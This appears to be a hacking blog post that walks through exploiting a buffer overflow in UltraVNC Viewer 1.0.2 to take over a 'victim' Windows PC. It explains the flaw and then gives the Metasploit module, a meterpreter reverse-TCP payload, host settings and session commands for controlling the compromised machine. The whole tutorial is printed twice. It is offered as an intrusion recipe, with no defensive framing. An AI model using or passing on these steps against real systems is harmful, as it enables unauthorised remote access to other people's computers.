Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack
fEatuRe f diZ xploiT :)
This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack
Exploit Targets
0 – Windows XP SP3 (default)
1-Windows XP SP2
2-Windows 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/vnc/ultravnc_bof
Msf exploit (ultravnc_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ultravnc_bof)>set lhost xxx.xxx.xxx (IP of Local Host)
Msf exploit (ultravnc_bof)>set srvhost xxx.xxx.xxx (This must be an address on the local machine)
Msf exploit (ultravnc_bof)>exploit
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack
Exploit Targets
0 – Windows XP SP3 (default)
1-Windows XP SP2
2-Windows 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/vnc/ultravnc_bof
Msf exploit (ultravnc_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ultravnc_bof)>set lhost xxx.xxx.xxx (IP of Local Host)
Msf exploit (ultravnc_bof)>set srvhost xxx.xxx.xxx (This must be an address on the local machine)
Msf exploit (ultravnc_bof)>exploit
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
0 comments:
Post a Comment